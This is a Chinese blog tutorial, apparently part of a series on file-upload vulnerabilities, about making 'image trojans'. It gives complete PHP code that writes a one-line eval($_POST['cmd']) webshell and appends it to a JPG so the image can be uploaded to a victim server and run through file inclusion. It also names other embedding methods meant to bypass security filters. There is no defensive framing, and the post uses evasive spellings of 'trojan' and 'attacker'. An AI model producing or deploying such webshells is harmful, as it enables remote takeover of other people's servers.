文件上传漏洞(六)一句话马图片

简介: 文件上传漏洞(六)一句话马图片

image.png

 

制作马图

方式一

一句话mu马图片是指将一句话mu马代码隐藏在正常的图片文件中,使得该图片文件成为一个mu马文件。公鸡者可以通过上传该图片文件到受害者的服务器上,并利用文件包含漏洞来执行该mu马代码,从而获取服务器的控制权。

下面是一个生成一句话mu马图片的示例代码:

<?php
$code = '<?php eval($_POST["cmd"]); ?>'; // 一句话马代码
$filename = 'shell.php'; // 生成的马文件名
$image = 'pic.jpg'; // 正常的图片文件名
$webshell = 'webshell.jpg'; // 生成的一句话马图片文件名

// 生成一句话马文件
file_put_contents($filename, $code);

// 将一句话mu马文件和正常的图片文件合并成一张图片马
$data = file_get_contents($image);
$data .= file_get_contents($filename);
file_put_contents($webshell, $data);

// 删除一句话马文件
unlink($filename);

该代码将一句话mu马代码存储在变量$code中,将生成的mu马文件名存储在变量$filename中,将正常的图片文件名存储在变量$image中,将生成的一句话mu马图片文件名存储在变量$webshell中。然后,该代码将一句话mu马文件和正常的图片文件合并成一张图片马,并将其保存为文件webshell.jpg。最后,该代码删除一句话mu马文件。

方式二

利用脚本edjpgcom

将图片投入到edjpgcom脚本,然后写入一句话马

方式三

利用cmd命令

image.png

方式四

利用16进制编写一句话,有更好的绕过安全过滤

image.png


相关文章
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
18037 0
|
安全 开发工具 git
CTF工具隐写分离神器Binwalk安装和详细使用方法
CTF工具隐写分离神器Binwalk安装和详细使用方法
4428 0
|
SQL 监控 安全
命令注入攻击
【8月更文挑战第17天】
849 2
|
开发框架 安全 .NET
Web安全-一句话木马
Web安全-一句话木马
874 5
|
安全 Linux iOS开发
Nmap 使用指南:安装、优缺点及备忘单
【8月更文挑战第20天】
2784 0
|
安全 Shell 网络安全
文件上传漏洞(四)edjpgcom
文件上传漏洞(四)edjpgcom
|
安全 Shell Linux
Webshell管理工具:AntSword(中国蚁剑)
中国蚁剑的下载、安装、详细使用步骤
4641 1
|
存储 安全 JavaScript
文件上传漏洞(一)一句话木ma
文件上传漏洞(一)一句话木ma
|
SQL 安全 数据库
[RCTF2015]EasySQL1 题目分析与详解
[RCTF2015]EasySQL1 题目分析与详解
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
8488 0

热门文章

最新文章